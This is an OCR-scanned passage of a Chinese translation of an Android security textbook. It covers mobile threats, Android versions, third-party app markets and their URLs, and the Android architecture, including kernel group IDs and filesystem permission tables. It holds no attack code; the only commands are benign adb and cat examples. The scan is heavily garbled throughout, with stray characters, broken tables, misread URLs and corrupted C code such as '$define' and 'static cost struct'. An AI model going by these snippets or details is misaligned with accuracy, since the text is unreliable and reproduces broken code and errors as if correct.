算 好 的 表 中 找到 密 钥 信息 。 考 虑 到 移动 设备 上 射频 识别 (Radio Frequency Identifi- 
cation, RFID) 功能 / 近 场 通信 (Near Field Communication, NFC) 功能 的 使 用 日 益 
频繁 ， 这 不 仅 将 导致 短信 和 语音 通话 会 被 破解 ， 甚 至 是 用 户 的 资料 数据 都 可 能 难 逃 
被 破解 的 命运 ， 如 信用 卡 支付 信息 等 。 

很 多 用 户 都 没有 意识 到 移动 设备 上 存在 的 风险 和 威胁 ， 它 们 同 个 人 电脑 上 的 风险 和 
威胁 很 类 似 。 尽 管 多 数 用 户 会 在 笔记 本 或 台式 电脑 上 使 用 一 些 保护 措施 〈 如 安装 杀毒 软 
件 ) ,但 是 他 们 却 没 有 注意 到 保护 移动 设备 的 必要 性 。 多 数 用 户 缺乏 专业 知识 ， 而 且 不 
懂得 移动 设备 上 某 些 操作 的 影响 ， 比 如 “越狱 "2 或 是 root? 。 用 户 总 是 把 他 们 的 信任 
寄托 在 那些 来 自 软件 仓库 中 的 应 用 软件 ， 无论 是 苹果 公司 的 应 用 软件 商店 ,还 是 
Android 应 用 软件 市 场 。 然 而 ， 恶 意 软件 往往 伪装 成 一 些 流行 的 应 用 软件 进入 Android 应 
用 软件 市 场 。 对 用 户 来 说 ， 每 天 都 有 可 能 下 载 一 个 0.99 美元 的 软件 。 这 时 ， 如 果 用 户 
经 常 从 软件 市 场 下 载 安装 应 用 程序 ， 他 将 很 难 注意 到 某 个 应 用 程序 的 行为 或 安全 性 。 

如 今 ， 人 们 越 来 越 多 地 使 用 自己 的 移动 设备 办 公 ， 而 不 愿意 使 用 公司 配 发 的 设 
备 。 越 来 越 多 的 Android 设备 和 iPhone 在 商业 环境 中 使 用 。 可 悲 的 是 ， 公 司 的 规章 制 
度 并 没有 跟 上 时 代 的 发 展 ， 还 是 更 多 关注 个 人 电脑 上 的 威胁 与 风险 ， 却 忽略 了 这 些 移 
动 设备 。 这 样 就 将 他 们 的 工作 环境 暴 露 在 了 那些 利用 移动 设备 及 其 用 户 实施 的 攻击 之 
下 。 实 际 上 ， 在 很 多 的 情况 下 ， 破 解 并 攻击 移动 设备 要 比 台式 电脑 更 加 容易 ， 然 而 企 
业 却 仍然 把 大 把 的 钱 花 在 台式 电脑 的 安全 防护 上 。 威 胁 尚未 出 现 ， 但 这 并 不 意味 着 就 
像 研究 人 员 或 企业 所 认为 的 那样 ， 不 存在 什么 太 大 的 风险 ， 这 类 威胁 可 能 来 自 那 些 国 
家 资助 的 机 构 ， 如 政府 情报 机 构 。 试 想 ， 如 果 将 这 些 攻击 运用 在 网 络 战 上 ,例如 ， 通 
过 传播 恶意 软件 ， 让 它们 阻塞 通信 媒介 ， 这 将 导致 整个 通信 网 络 的 瘫痪 。 





























1.3 Android 概述 


Android 不 仅仅 是 一 个 操作 系统 ， 它 更 是 一 个 完整 的 软件 栈 。Android 基于 
Linux 内 核 ， 建 立 在 Linux 提供 的 系统 平台 之 上 ， 由 Google 公司 主导 的 OHA 负责 开 
发 。 本 节 将 简要 地 介绍 Android 系统 的 历史 、 版 本 发 布 和 典型 Android 设备 的 特点 。 




















O “越狱 ”是 指 开放 用 户 的 操作 权限 ， 使 得 用 户 可 以 随意 擦 写 任 何 区 域 的 运行 状态 ， 只 有 越狱 成 功 后 iPhone 
的 文件 系统 才 处 于 可 读 写 (rw) 状态 ， 可 以 安装 和 运行 未 经 过 官方 认证 的 第 三 方程 序 、 插 件 。 一 一 译 者 注 
OQ root 是 计算 机 领域 术语 ， 在 UNIX 系统 (如 AIX, BSD $) 和 类 UNIX 系统 (如 Debian, Redhat, 
Ubuntu 等 各 个 发 行 版 的 Linux) 以 及 Android 系统 中 ， 超 级 用 户 一 般 命名 为 root。 手 机 root 通常 是 针对 
Android 系统 的 手机 而 言 ， 它 使 得 用 户 可 以 获取 Android 操作 系统 的 超级 用 户 权 限 。root 通常 用 于 帮助 
户 越过 手机 制造 商 的 限制 ， 使 得 用 户 可 以 缉 载 手机 制造 商 、 运 营 商 、 第 三 方 渠道 商 预 装 在 手机 中 
某 些 应 用 ， 以 及 运行 一 些 需 要 超级 用 户 权限 的 应 用 程序 。Android 系统 的 root 与 Apple iOS 系统 的 
“越狱 ”类 似 。 一 一 译 者 注 
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Android 系统 并 不 是 在 Google 公司 诞生 的 , 2005 年 Google 公司 收购 了 Android 
公司 ，2007 年 Google 公司 参与 创建 OHA。 那 时 ， 共 有 86 家 公司 共同 参与 创建 了 
OHA, Google 公司 选择 使 用 Apache 许可 证 开放 Android 源码 。AOSP (Android Open 
Source Project, Android 开源 项 目 ) 负责 维护 Android 源码 并 进一步 对 其 进行 开发 。 
主流 电信 公司 ， 像 HTC 公司 、LG 公司 、 摩 托 罗 拉 公 司 和 高 通 公司 都 是 OHA 的 成 
员 ， 该 组 织 致力 于 移动 设备 开放 标准 的 研发 。 而 Google 公司 领导 的 OHA， 则 负责 
实现 对 Android 平台 的 研发 和 维护 。 

Android 对 外 开放 系统 源码 ， 所 有 的 企业 都 可 以 自由 地 使 用 该 系统 ， 因 此 
Android 系 统 是 企业 友好 的 。 只 要 遵循 Apache 2. 0 版 本 的 开源 许可 协议 ， 就 能 够 获 
得 并 使 用 Android 系统 的 源码 ， 而 要 获得 并 使 用 Linux 内 核 的 源码 则 需要 遵循 GNU 
2. 0 版 本 开源 许可 协议 才 可 以 。Android 系统 上 所 有 的 应 用 程序 都 是 平等 的 ， 虽 然 
在 系统 中 存在 内 置 的 浏览 器 ， 但 用 户 仍 然 可 以 自由 地 下 载 其 他 浏览 器 ， 如 火狐 、 
Opera 等 ， 这 些 浏 览 需 同 内 置 浏 览 器 在 地 位 上 是 一 样 的 ， 用 户 可 以 选择 自己 的 应 用 
程序 替换 系统 中 内 置 的 应 用 程序 。 此 外 ， 出 于 对 授权 许可 的 考虑 ，Android 并 没有 
使 用 已 有 的 Java 虚拟 机 ， 而 是 开发 了 自己 的 Dalvik 虚拟 机 。 

自从 最 原始 的 Android 版 本 发 布 以 后 ，Android 已 经 发 布 了 很 多 个 系统 版 本 ， 
每 一 个 版 本 都 修复 了 之 前 版 本 中 存在 的 一 些 漏洞 ， 增 加 了 一 些 新 的 功能 和 特性 。 版 
本 名 称 按照 字母 顺序 以 甜点 名 称 命 名 。 图 1.9 总 结 了 各 个 Android 发 布 版 本 及 其 特 
点 ， 图 1. 10 统计 了 现 有 设备 上 各 个 Android 版 本 的 占 比 。 


版 本 说 明 

















Android 1.0 Android 1.0 版 本 是 2008 年 秋天 发 布 的 第 一 款 商 业 Android 系 统 版 本 。 第 一 部 Android 
设备 是 HTC 生 产 的 搭载 了 Android 1.0 版 本 的 HTC Dream (G1) 。1.0 版 本 的 Android 
系统 的 主要 更 新 包括 : 系统 内 置 了 Android Market 应 用 程序 、 更 新 了 内 置 浏览 器 、 
支持 照相 机 功能 、 改 进 了 联系 人 应 用 程序 、 日 历 、 聊 天 程序 、 地 图 ， 以 及 搜索 功能 


Android 1.5 1.5 版 本 的 Android 系 统 基于 2.6.27 版 本 的 Linux 内 核 

(Cupcake) 

Android 1.6 1.6 版 本 的 Android 系 统 基于 2.6.29 版 本 的 Linux 内 核 ， 增 加 的 新 功能 包括 提升 的 语音 和 文 
(Donut) 字 搜 索 能 力 ， 支 持 WVGA 屏 幕 

Android 2.3 2.3 版 本 的 Android 系 统 优化 了 用 户 界面 ， 改 进 了 对 软 键盘 的 支持 ， 提 升 了 游戏 性 能 ， 并 且 
(Gingerbread) 开始 支持 SIP 和 NFC 功 能 

Android 3.0 支持 更 大 的 屏幕 ， 引 入 了 对 多 核 处 理 器 、 图 形 硬件 加 速 器 和 全 系统 加 密 功 能 的 支持 。 该 
(Honeycomb) 版 本 的 Android 系 统 主要 面向 平板 设备 

Android 4.0 is PR 

(Ice Cream Ti Android 3.0 版 本 的 功能 移植 到 智能 手机 上 ， 新 增加 了 面部 识别 解锁 功能 、 数 据 流 
Sandwich) 量 使 用 情况 监控 功能 和 社交 网 络 联系 人 整合 功能 





图 1.9 Android 发 布 版 本 
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*| 1.10 现 有 设备 上 Android 版 本 分 布 














Android 软件 栈 为 用 户 、 开 发 者 以 及 制造 商 提供 了 很 多 特性 ， 其 中 主要 特性 如 


图 1.11 所 示 。 


特 性 


应 用 程序 框架 
Dalvik HMHL 


Browser (浏览 器 ) 


Graphics 


SQLite 
Media 


其 他 
开发 环境 


说 明 
应 用 程序 框架 在 设计 上 提升 了 对 已 有 软件 /组 件 的 复 用 和 替换 
可 以 运行 dex 文 件 的 虚拟 机 ， 专 门 针对 移动 设备 内 存 容量 低 、 电 池 
电量 有 限 的 特点 进行 优化 


基于 WebKit 引 擎 的 Android 浏 览 器 


Android 的 图 像 显示 能 力 基于 Google 定 制 的 2D 图 像 库 的 支持 ， 
Android 的 3D 图 像 泻 染 基于 OpenGL ES 1.0 版 本 API 支 持 


用 于 存储 和 处 理 数据 
支持 常见 的 音频 、 视 频 文件 格式 
GSM 制 式 电话 功能 ， 蓝 牙 ，Wi-Fi 


基于 Eclipse(ADT) 提 供 的 功能 完善 的 开发 环境 ， 用 于 调试 、 测 试 和 
分 析 Android 应 用 程序 的 模拟 器 


图 1.11 Android 主要 特性 


1.4 Android 应 用 软件 市 场 


Android 应 用 程序 可 以 从 很 多 应 用 软件 市 场 下 载 安装 。 虽 然 Google 公司 已 经 提 
供 了 最 大 的 Android 应 用 软件 市 场 ， 但 是 用 户 还 是 会 从 其 他 的 Android 软件 市 场 上 
下 载 应 用 ， 比 如 亚马逊 。 这 一 点 同 iPhone 的 应 用 软件 商店 模式 大 不 一 样 。 上 传 到 





Android 应 用 软件 市 场 的 应 用 程序 没有 经 过 严格 的 验证 或 安全 性 检查 ， 人 们 可 以 很 


c 


容易 地 开发 一 些 恶意 


E 


软件 (例如 伪装 成 当前 流行 应 用 软件 的 免费 版 本 ) ， 然 后 上 传 


ui 
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到 Google 公司 的 Android 应 用 软件 市 场 。 大 多 
数 情 况 下 ， 这 些 软件 会 被 Google 公司 发 现 并 
删除 掉 。 然 而 ， 由 于 有 很 多 个 Android 应 用 软 SIM 卡 锁定 
件 市 场 ， 因 此 ,仍然 会 有 一 些 使 用 其 他 设置 SIM 卡 锁定 
Android 应 用 软件 市 场 的 用 户 受 到 这 类 恶意 软 密码 

件 的 影响 或 攻击 ， 如 图 1. 12 所 示 。 当 用 户 选 使 密码 可 见 
择 不 可 靠 的 软件 来 源 下 载 并 安装 应 用 程序 时 ， nama 

这 种 情况 下 ，Google 公司 则 把 风险 转嫁 给 . 
用 户 。 这 不 是 一 个 理想 的 机 制 ， 至 少 应 该 像 
苹果 公司 一 样 ， 对 每 个 申请 发 布 的 软件 进行 
安全 性 检查 ， 然 后 再 发 布 到 应 用 软件 市 场 上 。 

如 下 是 对 Android 应 用 软件 市 场 模式 存在 
问题 的 归纳 : 

1) 即便 是 Google 公司 自己 的 Android 应 
用 软件 市 场 ， 也 没有 对 应 用 程序 进行 严格 详 图 112 安装 来 自 未 知 源 的 应 用 程序 
细 的 安全 性 审查 。 

2) 用 户 需要 自行 验证 从 二 级 应 用 软件 市 场 上 获得 的 应 用 程序 ， 并 且 承 担 这 些 
应 用 可 能 存在 的 风险 。 

3) 特定 内 容 (如 成 人 内 容 等 ) 的 Android 应 用 程序 没有 对 不 同 用 户 群 体 进 行 
验证 和 限制 就 能 被 下 载 并 安装 ， 如 拥有 手机 的 未 成 年 人 。 

表 1.1 展示 了 部 分 Android 应 用 软件 市 场 及 其 网 址 。 


表 1.1 Android 应 用 软件 市 场 


9 S a EE FF 5:38 















































软件 市 场 名 称 网 HE 

Google Android Market https: //play. google. com/store * 

Amazon Appstore http: //www. amazon. com/b? node 22350149011 * 

SlideMe http: //slideme. org/ * 

GetJar http: //www. getjar. com/ * 

Soc. io http: //soc. io/ * 

1Mobile http://www. Imobile. com/ * 

Appbrain http://www. appbrain. com * 

AppsLib http: //appslib. com/ * 

Handango http://www. handango. com * 

ania http://www. motorola. com/Consumers/US- EN/ Consumer- Product- and- Services/ 
APPS/App- Picks * 

GoApk http: //bbs. anzhi. com/ * 
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(E) 
软件 市 场 名 称 网 HE 
Androidblip http://www. androidblip. com/ * 
AndroidPit http://www. androidpit. com/ * 
Appoke http: //appoke. com/ * 
AppstoreHQ http://www. appstorehq. com/ * 
BlapkMarket http: //blapkmarket. com/en/login/ * 
Camangi http://www. camangimarket. com/index. html * 
Indiroid https: //indiroid. com/ * 
Insyde Market http://www. insydemarket. com/ * 
Appstoreconnect http: //appstoreconnect. com/publish/ * 
Mobihand http://www. mobihand. com/ * 
Applanet http: //applanet. net/ * 
Handster http://www. handster. com/ * 
Phoload http://www. phoload. com/ * 
1.5. 小 结 


本 章 主要 介绍 了 近年 来 移动 设备 的 格局 以 及 在 数量 上 的 巨大 增长 ,讨论 了 
Android 系 统 的 占有 率 和 市 场 份 额 。 目 前 ，Android 已 经 成 为 智能 手机 和 平板 电脑 
(平板 电脑 方面 iPad 也 是 一 个 不 错 的 选择 ) 的 首选 系统 平台 。 随 后 ， 本 章 还 介绍 了 
移动 设备 安全 威胁 的 演变 ， 既 有 针对 应 用 程序 的 ， 也 有 涉及 蜂 帘 技术 本 身 的 安全 威 








胁 。 最 后 ， 以 Android 应 用 软件 市 场 模 式 作 为 





M id 


DHH, 


探讨 了 该 模式 对 Android HJ 


全 性 可 能 存在 的 影响 。 总 之 ， 对 于 用 户 、 企 业 、 开 发 者 和 安全 专业 人 员 来 说 ， 


Android 的 安全 性 已 经 变 成 了 非常 重要 的 问题 。 





从 第 2 章 开始 ， 本 书 将 介绍 Android 


系统 的 基础 知识 ， 然 后 继续 讨论 Android 系统 的 安全 问题 。 


第 2 全 Android 体系 结构 


本 章 主要 介绍 Android 的 体系 结构 ， 涵 盖 了 Android 软件 栈 的 各 个 层次 ， 从 
Linux 内 核 到 上 层 应 用 ， 以 及 各 个 层次 存在 的 安全 风险 的 程度 。 然 后 ， 引 导读 者 逐 
步 了 解 从 Android 的 启动 过 程 到 Android 使 用 环境 下 的 各 种 设置 ， 展 示 了 Android 软 
件 开 发 工具 包 (Software Development Kit，SDK) 提供 的 各 种 工具 。 最 后 ， 通 过 实 
践 演示 如 何 下 载 并 安装 Android SDK， 以 及 使 用 命令 行 shell 工具 同 Android 系统 进 
行 交互 。 








2.1 Android 体系 结构 概述 


Android 系统 可 以 看 成 是 由 不 同 层次 构成 的 软件 栈 ， 每 层 都 有 独自 的 功能 并 向 
上 层 提供 特定 的 服务 。Linux 内 核 居于 软件 栈 的 最 底层 ， 其 上 是 本 地 库 和 Android 
运行 时 环境 (Dalvik 虚拟 机 与 核心 库 ) ， 再 上 一 层 是 应 用 程 
序 框 架 层 ， 用 于 实现 Android 同 本 地 库 和 Linux 内 核 交 互 ， 应 用 程序 
最 上 层 是 Android 的 各 种 应 用 程序 。 以 下 是 各 层 的 详细 介 
ZH, F2. 1 描述 了 Android 软件 栈 的 层次 结构 ， 图 2. 2 描述 
了 每 一 层 中 包含 的 组 件 。 支持 库 和 运行 时 环境 


2.1.1 Linux 内 核 层 Linux] E 


Android 系统 的 Linux 内 核 位 于 Android 软件 栈 的 最 底 
层 , 它 不 是 通常 所 见 到 的 传统 的 Linux 系统 (例如 
Ubuntu), ， 而 是 提取 了 传统 的 Linux 系统 的 内 核 代码 ， 经 过 修改 和 优化 ， 使 其 更 加 
适合 在 能 人 式 环 境 下 运行 。 因 此 ，Android 系统 的 Linux 内 核 不 具有 一 些 传统 的 
Linux 发 布 版 本 的 特性 ， 如 X 窗口 系统 、/bin 目录 下 的 一 整套 标准 GNU 工具 ( 例 
W, sd 等 工具 ) ， 以 及 一 些 系 统 配 置 文件 (如 存储 用 户 密码 的 /etc/shadow 文件 
等 )。 表 2.1 展示 了 Android 系统 版 本 和 其 基于 的 Linux. 内 核 版 本 的 对 应 关系 。 
Android 团 队 修 改 了 传统 的 Linux 内 核 代码 ， 从 而 形成 了 一 个 新 的 Linux 内 核 分 支 ， 
专门 用 于 般 入 式 环境 。 该 Linux WIH Android 团队 负责 维护 ， 所 做 的 改动 主 
要 用 于 支持 今后 发 布 的 各 种 Android 系统 版 本 。 从 安全 性 的 角度 上 来 看 ， 这 么 做 是 
极为 重要 的 ， 因 为 针对 Linux 内 核 安 全 的 改动 和 强化 一 直 都 在 持续 地 进行 ， 只 有 了 积 
极地 将 这 些 安全 优化 不 断 地 融入 到 Android 系统 的 Linux 内 核 分 支 ， 才 能 始终 让 用 
户 获 得 最 佳 的 Linux 功能 。 








应 用 程序 框架 





2.1 Android 软件 
栈 层次 结构 
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应 用 程序 


Home Contacts Phone Browser 


应 用 框架 


ctivitv Mane Window Content 3n E] zz 22: 38 
voip scd Manager Providers 视图 系统 通知 管理 


Telephony R o 
Package Manager Nap Manager 位 置 管理 XMPP 服 务 


标准 " Android 运 行 时 环境 


"X. RD i 
^ 7*Nfedia SQLite j 核心 库 


Framework 


o E i Lipi Bt 
显示 器 驱动 相机 驱动 蓝牙 驱动 闪存 驱动 ii tad 


USB 驱 动 键盘 驱动 Wi-Fi 驱 动 位 置 管 理 电源 管理 





图 2.2 Android 软件 栈 内 各 层 内 部 组 件 9 
表 2.1 Android 系统 版 本 与 Linux 内 核 版 本 对 应 关系 


























Android 系统 版 本 Linux 内 核 版 本 
Android Cupcake 1.5 Linux 内 核 2. 6. 27 
Android Donut 1.6 Linux 内 核 2. 6. 29 
Android Eclair 2.0/2.1 Linux 内 核 2. 6. 29 
Android Froyo 2.2 Linux 内 核 2. 6. 32 
Android Gingerbread 2.3. x Linux 内 核 2. 6. 35 
Android Honeycomb 3. x Linux 内 核 2. 6. 36 
Android Icecream Sandwich 4. x Linux 内 核 3.0. 1 


相 比 于 最 初 的 Linux 内 核 ，Android 系统 的 Linux 内 核 分 支 已 经 加 入 了 很 多 的 改 
进 。 而 且 近 期 ，Linux 社区 决定 将 在 其 下 一 个 Linux 内 核发 布 版 本 (EI Linux 内 核 
3.3 版 本 ) 中 融入 这 些 改进 。 

Linux Jj Android 系统 提供 了 坚实 的 底层 基础 ， 包 括 硬件 抽象 、 驱 动 管理 、 安 全 
管理 、 进 程 管理 以 及 内 存 管 理 等 多 种 功能 特性 。 其 中 ， 借 助 硬件 抽象 特性 ，Android 
可 以 移植 到 各 种 支持 设备 上 。 同 时 ，Linux 内 核 为 设备 厂商 提供 了 强大 的 设备 驱动 模 





”图 片 资 料 转自 网 络 : http: //en. wikipedia. org/ wiki/ Android, [ operating system | 。 一 一 原 书 注 
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型 ， 更 重要 的 是 ， 在 Android 软件 栈 中 还 增加 了 一 个 硬件 抽象 层 。 该 驱动 模型 易于 理 
解 并 且 容 易 测试 ， 因 此 ， 很 多 常见 的 设备 驱动 可 以 直接 编译 到 Linux 内 核 中 ， 自 由 获 
得 并 查看 。 而 且 ， 专 门 有 一 个 活跃 的 软件 开发 社区 为 Linux 内 核 编 写 驱 动 程序 。 这 种 
做 法 主要 出 于 两 种 重要 考虑 ， 一 则 ， 使 Android 系统 可 以 广泛 地 支持 大 量 的 设备 ， 尤 
其 对 于 平板 电脑 来 说 ， 这 一 点 更 为 重要 。 二 则 ,借助 这 种 易于 理解 的 驱动 模型 ， 可 以 
让 设备 厂商 和 开发 者 更 容易 地 编写 设备 驱动 程序 。Android 系统 依赖 Linux 提供 的 基 
本 操作 系统 功能 ， 主 要 包括 IO、 内 存 管理 和 进程 管理 等 。 图 2.3 显 示 了 Android 
2.3.3 版 本 系统 使 用 的 Linux 内 核 的 版 本 号 (使 用 cat/proc/version 命令 查看 ) 。 












































: O 个 Anmol pentestusrlGtools-gibbons-vm-2: ~ — ssh — 80x24 
pentestusri8tools-gibbons-vm-2:-$ adb shell 

# cat /proc/version 

Linux version 2.6.29-00761-90097074-dirty (digit&digit.mtv.corp.google.com) (gcc 


version 4.4.0 (GCC) ) #20 Wed Mar 31 09:54:02 PDT 2010 
# 





图 2.3 Linux 内 核 版 本 


从 安全 角度 上 来 看 ，Linux 为 Android 系统 提供 了 一 个 简单 但 安全 的 基于 用 户 
和 权限 的 安全 模型 。 而 且 ，Linux 内 核 还 为 Android 提供 了 进程 隔离 和 安全 的 IPC 
(Internet Process Connection， 进 程 间 通信 ) 功能 。 同 时 ，Android 系统 已 经 精简 了 
Linux 内 核 ， 这 样 就 缩小 了 可 能 受到 攻击 的 范围 。 在 内 核 中 ， 每 个 Android 应 用 程 
序 作为 一 个 单独 的 用 户 和 进程 运行 ,在 Linux 内 核 上 ， 基 于 用 户 的 权限 模型 不 允许 
应 用 程序 读 取 其 他 应 用 程序 的 信息 ， 或 是 干扰 其 他 应 用 程序 的 运行 (例如 ， 内 存 、 
CPU 、 其 他 设备 等 )。 出 于 对 安全 考虑 ，Android 对 Linux 内 核 做 出 了 一 定 的 改进 和 
Meam. 例如， 根据 调用 进程 所 属 群 组 的 ID 限制 对 网 络 和 蓝牙 模块 的 访问 ， 该 功能 
通过 ANDROID PARANOID NETWORK 内 核 编译 选项 实现 。 只 有 特定 的 群 组 ID 能 
够 访问 网 络 或 蓝牙 模块 功能 。 这 些 群 组 定义 在 /include/linux/android_aids. h (该 文 
件 位 于 内 核 源 码 中 ) 文件 中 。 从 代码 段 1 可 见 ， 内 核 组 AID_INET 的 群 组 ID 为 
3003 ， 只 有 成 为 该 群 组 成 员 的 进程 才能 建立 /打开 IPv4 和 IPv6 套 接 字 。 


/* include/linux/android aid.h 


*/ 

































































#ifndef LINUX ANDROID AID H 
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$define LINUX ANDROID AID H 


/* AIDs that the kernel treats differently */ 
#define AID NET BT ADMIN 3001 


#define AID NET BT 3002 

#define AID _ INET 3003 

#define AID NET RAW 3004 

$define AID NET ADMIN 3005 

fdefine AID NET _ BW STATS 3006 /* read bandwidth 
statistics 

NE 

$define AID NET BW  ACCT 3007 人 change bandwidth 


statistics accounting */ 


fendif 


代码 段 1  include/linux/android. aid. h 


— H ix HE N 4% 2H TE/include/linux/android. aid. h 文件 中 定义 ， 就 会 被 映射 到 
/system/ core/ include/ private/ android, filesystem, config. h 文件 中 的 逻辑 组 “inet” 上。 
下 面 的 代码 段 2 取 自 android, filesystem, config. h 文件 ， 可 见 逻 辑 组 名 “inet” 被 映 
射 到 了 内 核 群 组 “AID_INET”， 且 和 群 组 ID 为 3003。 








"available", 
“nfe” 

, 
"drmrpc", 
"shell", 
"cache", 


AID AVAILABLE, 
AID NFC, }, 
AID  DRMRPC, 


AID SHELL, 
AID CACHE, 


) 
}, 


h 


b 


static cost struct android id info android ids[] = { 
( "root", AID _ ROOT, }, 
{ “system”, AID SYSTEM, ], 
( "radio", AID RADIO, ], 
( "bluetooth", AID BLUETOOTH, ], 
( "graphics", AID GRAPHICS, ], 
( "input", AID _ INPUT, ], 
( "audio", AID AUDIO, ], 
( "camera", AID CAMERA, ], 
( “log”, AID LOG, }, 
( "compass", AID _ COMPASS, ], 
{ "mount*, AID _ MOUNT, }, 
{ “wifi”, AID WIFI, }, 
( "dhcp", AID _ DHCP, }, 
{ “adb”, AID _ ADB, ), 
{ “install”, AID _ INSTALL, }, 
{ “media”, AID MEDIA, }, 
( "drm", AID DRM, }, 
{ 
{ 
{ 
{ 
{ 
{ 


“diag”, 


AID DIAG, 


) 
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"net bt admin", AID NET BT ADMIN, 


"net _ bt”, 
“sdcard _ rw”, 
"media rw", 


bi " 


vpn, 
"keystore", 
"usb", 


. admin", 
"net bw stats", 
"net bw _ acct”, 


AID NET BT, }, 

AID SDCARD RW, ), 
AID MEDIA RW, } ` 
AID VPN, ), 

AID KEYSTORE, ), 
AID USB, }, 

AID MTP, }, 

AID GPS, }, 

AID _ INET, ), 

AID NET RAW, ), 
AID NET ADMIN, ], 
AID NET BW STATS, 
AID NET BW  ACCT, 


h 


}, 


}, 


人 
2 
2 
[^] 
` 
` 
~ 


) 


"misc", AID MISC, 
"nobody", AID NOBODY, ], 
h 
代码 段 2 android filesystem | config, h 





当 Android 应 用 程序 请 求 访问 互联 网 时 ， 实 质 上 是 请 求 打开 IPv4 和 IPv6 E 
字 的 权限 ， 通 过 /system/etc/permissions/platform. xml 文件 将 应 用 程序 的 权限 映射 到 
“inet” 逻 辑 组 ， 继 而 映射 到 内 核 群 组 AID_INET 上 。 下 面 的 xml 代码 段 用 于 实现 将 

















应 用 程序 的 权限 映射 到 内 核 群 组 AID_INET。 





<permission name-"android.permission.INTERNET" > 


<group gid-"inet" /> 
</permission> 


获得 互联 网 访问 权限 的 应 用 程序 运行 时 详细 信息 如 图 2.4 所 示 。 


uppiesWallpaper 
S (sleeping) 
278 


33 
TracerPid: 各 
10036 
10036 


10036 
10036 
: 256 
: 3003 
82888 
82888 
@ 
18988 
18988 
11384 
84 
4 
39844 
134 


10036 
10036 


10036 
10036 








图 2.4 获得 互联 网 访问 权限 的 应 用 程序 所 属 群 组 ID 为 3003 ( AID. INET) 
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从 安全 角度 来 看 ， 除 了 把 内 核 群 组 ID 映射 成 逻辑 名 称 外 ， 还 有 男 一 个 重要 的 
安全 手段 ， 就 是 借助 于 android, filesystem, config. h 文件 。 该 文件 中 定义 了 Android 
文件 系统 所 有 文件 和 目录 的 所 属 规则 。 例 如 ，/data/app 目录 属于 AID. SYSTEM 用 
户 和 AID_SYSTEM 群 组 ， 如 图 2. 5 所 示 。 该 所 属 关系 通过 下 面 代码 实现 : 

(00771,AID SYSTEM, AID SYSTEM, "data/app" | 









































2012-01-05 01:34 busybox 
2011-12-23 23:41 secure 
2011-12-23 23:40 misc 
2011-12-23 23:40 local 
2011-12-23 23:40 app-private 
2011-12-23 23:42 property 
2012-02-28 02:35 app 


2012-02-28 02:35 data 
2012-02-26 10:18 anr 
2011-12-23 23:40 dontpanic 
2012-02-28 02:35 dalvik-cache 
2012-04-29 04:18 backup 
2012-04-29 19:48 system 
2011-12-23 23:40 lost«found 





图 2.5 — android filesystem, config. h 文件 定义 /data 目录 的 拥有 者 为 systemO 











其 中 ， 第 一 个 字段 为 该 目录 的 访问 权限 (权限 为 771 ) ， 第 二 个 字段 和 第 三 个 字段 分 
别 为 拥有 者 的 用 户 ID 和 和 群 组 D， 最 后 一 个 字段 为 目录 路 径 。 android _filesystem_ 
config. h 文 件 部 分 代码 段 如 下 所 示 。 








static struct fs path config android _dirs[] = { 
(00770, AID SYSTEM, AID _ CACHE, "cache" ], 
(00771, AID SYSTEM, AID SYSTEM, "data/app" ], 
(00771, AID SYSTEM, AID SYSTEM, "data/app-private" ], 
(00771, AID SYSTEM, AID SYSTEM, "data/dalvik-cache" }, 
(00771, AID SYSTEM, AID SYSTEM, "data/data" ], 

(00777, AID  ROOT, AID _ ROOT, “sdcard” }, 

(00755, AID _ ROOT, AID ROOT, 0 }, 

Hu 


/* Rules for files. 

** These rules are applied based on "first match", so they 
** should start with the most specific path and work their 
** way up to the root. Prefixes ending in * denotes 

















Q system 是 Linux 内 核 的 系统 用 户 。 BE 
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wildcard 

** and will allow partial matches. 

*/ 

static struct fs path config android files[] = { 


{ 00440, AID _ ROOT, AID SHELL, "system/etc/init. 
goldfish.rc" }, 

{ 00550, AID _ ROOT, AID SHELL, "system/etc/init. 
goldfish.sh" }, 

( 00440, AID _ ROOT, AID SHELL, "system/etc/init. 
trout.rc" ], 

{ 00550, AID _ ROOT, AID SHELL, "system/etc/init.ril" 


( 00750, AID _ ROOT, AID SHELL, "init*" }, 
( 00644, AID ROOT, AID ROOT, 0}, 
H 





代码 段 3 Android 系统 目录 及 文件 权限 


Android 内 核对 Linux 内 核 做 了 一 定 的 改进 ， 包括 Binder IPC 机 制 、 电 源 管理 、 
曾 钟 、 低 内 存 管理 右 和 日 志 系 统 等 特性 。 日 志 系 统 功能 在 整个 Android 系统 上 提供 
了 一 个 日 志 记 录 工 具 ， 通 过 logcat 命令 调用 。 在 本 章 后 面 的 Android 工具 一 节 中 将 
详细 介绍 logcat 命令 。 


2.1.2 标准 库 层 


Android 包含 一 组 C 和 C ++ 支持 库 ， 这 些 支 持 库 能 被 Android 系统 内 不 同 的 组 件 
使 用 ， 见 表 2.2。 开 发 者 可 以 通过 应 用 程序 框架 层 使 用 这 些 支 持 库 。 有 时 ， 本 层 也 被 
称 作 本 地 层 ， 这 是 因为 上 层 应 用 程序 层 和 应 用 程序 框架 层 的 代码 主要 使 用 Java 语言 
编写 ， 与 它们 不 同 是 ， 本 层 主要 采用 C 和 C++ 语言 实现 ， 并 针对 底层 硬件 做 了 代码 
性 能 优化 。Android 应 用 程序 可 以 使 用 JNI (Java Native Interface, Java 本 地 接口 ) 调 
用 这 些 支持 库 提 供 的 函数 功能 ， 除 了 系统 C 库 (bionic)， 大 部 分 的 支持 库 没 有 什么 
改动 , 如 SSL、SQLite 等 。Android 的 系统 C 库 ， 也 称 为 bionic， 不 是 典型 的 libe JÆ, 
它 基 于 BSD 授权 许可 并 对 libe 库 进 行 了 精简 ， 从 而 更 加 适用 于 艇 入 式 平台 。 


表 2.2 Android 本 地 层 库 

























































































x 持 库 说 明 
Media Libraries 基于 Packet Video Open Core， 支 持 多 种 常用 音频 、 视 频 格式 的 录制 和 回放 功能 
SQLite 为 应 用 程序 和 系统 提供 关系 型 数据 库 支 持 
SSL 提供 对 典型 加 密 功能 支持 
Bionic 系统 C 库 ， 提 供 基 于 C 语言 的 系统 函数 库 
WebKit Android 浏览 器 使 用 的 浏览 器 引擎 
Surface Manager 提供 对 显示 子 系统 的 支持 和 管理 
SGL 用 于 Android 的 底层 2D 图 形 引擎 
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2.1.3 Android 运行 时 环境 


Android 运行 时 环境 由 两 部 分 构成 : Dalvik 虚拟 机 和 核心 库 。 使 用 Java 语言 编 
写 的 Android 应 用 程序 被 编译 成 Java 类 文件 (. class 格式 ) ， 但 是 Android 不 会 直接 
